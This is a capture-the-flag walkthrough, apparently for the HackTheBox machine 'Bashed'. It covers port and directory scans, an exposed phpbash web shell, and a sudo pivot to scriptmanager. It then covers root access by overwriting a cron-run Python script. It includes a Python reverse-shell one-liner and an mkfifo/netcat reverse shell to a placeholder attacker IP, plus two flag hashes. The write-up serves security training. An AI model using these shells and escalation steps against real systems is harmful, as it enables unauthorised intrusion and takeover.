Nmap Results

# Nmap 7.93 scan initiated Wed Mar 29 00:20:11 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt 10.129.97.27
Nmap scan report for 10.129.97.27
Host is up (0.014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   12.31 ms 10.10.14.1
2   12.42 ms 10.129.97.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 00:20:34 2023 -- 1 IP address (1 host up) scanned in 23.26 seconds

Service Enumeration

TCP/80

gobuster dir -u http://10.129.97.27 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 100 -o gobuster.txt

/about.html           (Status: 200) [Size: 8193]
/config.php           (Status: 200) [Size: 0]
/contact.html         (Status: 200) [Size: 7805]
/css                  (Status: 200) [Size: 1759]
/dev                  (Status: 200) [Size: 1149]
/fonts                (Status: 200) [Size: 2096]
/images               (Status: 200) [Size: 1565]
/index.html           (Status: 200) [Size: 7743]
/js                   (Status: 200) [Size: 3166]
/php                  (Status: 200) [Size: 940]
/scroll.html          (Status: 200) [Size: 10863]
/single.html          (Status: 200) [Size: 7477]
/uploads              (Status: 200) [Size: 14]

Looking at the output, the most immediately interesting resources are:

• /dev/
• /php/
• /uploads

And just like that, we foudn the phpbash.php script:

Great, so we've got command execution on the target! Let's see if I can ping my VPN IP.

Excellent! We can communicate back to my Kali instance, so the prospects of a reverse shell have become that much more promising. Netcat is installed on the target, but does not support the -e parameter.

Exploit

The system administrator made globally readable a sensitive directory on the web server. This directory contains a PHP script that allows an unauthenticated user to execture arbitrary commands on the remote server. This directory should not be globally readable and ideally the development environment should be isolated away in a non-public network.

Reverse Shell

Attack Box

sudo rlwrap nc -lnvp 80

Target

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<vpn-ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Post-Exploit Enumeration

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

OS & Kernel

NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
    
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Users

arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash

Groups

arrexel:x:1000:
adm:x:4:syslog,arrexel
cdrom:x:24:arrexel
sudo:x:27:arrexel
dip:x:30:arrexel
plugdev:x:46:arrexel
arrexel:x:1000:
lpadmin:x:114:arrexel
sambashare:x:115:arrexel

scriptmanager:x:1001:

Network

ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:4b:66 brd ff:ff:ff:ff:ff:ff
    inet 10.129.97.27/16 brd 10.129.255.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4b66/64 scope global mngtmpaddr dynamic 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:4b66/64 scope link 
       valid_lft forever preferred_lft forever

N/A

N/A

All open ports previously enumerated.

N/A

Processes

No interesting processes

Services

UNIT                         LOAD   ACTIVE SUB     DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
init.scope                   loaded active running System and Service Manager
accounts-daemon.service      loaded active running Accounts Service
apache2.service              loaded active running LSB: Apache2 web server
cron.service                 loaded active running Regular background program pr
dbus.service                 loaded active running D-Bus System Message Bus
getty@tty1.service           loaded active running Getty on tty1
open-vm-tools.service        loaded active running Service for virtual machines 
rsyslog.service              loaded active running System Logging Service
systemd-journald.service     loaded active running Journal Service
systemd-logind.service       loaded active running Login Service
systemd-timesyncd.service    loaded active running Network Time Synchronization
systemd-udevd.service        loaded active running udev Kernel Device Manager
dbus.socket                  loaded active running D-Bus System Message Bus Sock
syslog.socket                loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket      loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket  loaded active running udev Kernel Socket

Scheduled Tasks

No interesting scheduled tasks.

Interesting Files

Permission denied (see privilege escalation)

Permission denied (see privilege escalation)

Privilege Escalation

Lateral Pivot

The most obvious privilege escalation path from the initial access is the output from sudo -l command above when enumerating the current user, as it showed that we can run any command as the user scriptmanager without the need for a password. We can use this to spawn a Bash sub-process as the user scriptmanager.

sudo -u scriptmanager /bin/bash -ip

More Enumeration

From before, we found the interesting /scripts directory, which is owned by the scriptsmanager user.

There's nothing particularly useful about this script at first glance. It's just opening a file in write mode and adding the text, "testing 123!" to the file. But, you'll notice that the test.txt file that it's reading is owned by root.

That would lead me to believe that the root user has a cron job that runs this script at regular intervals, allowing us to control which file is read and written to using this script.

Test Script Modifications

Let's give it a test:

cd /scripts
cp test.py test.py.orig
sed -i 's/testing\ 123\!/0xBEN was here/' test.py

Then, we'll give it a minute or more to see if the file is overwritten with our new content.

Excellent! We can use this script to get a reverse shell as root.

Reverse Shell as Root

echo -e 'import os\nos.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [vpn-ip] [port] >/tmp/f")' > test.py

Flags

30713224fb6d6052e4a3531c810bfdc2

b3f15ad04264315df873221871b3da80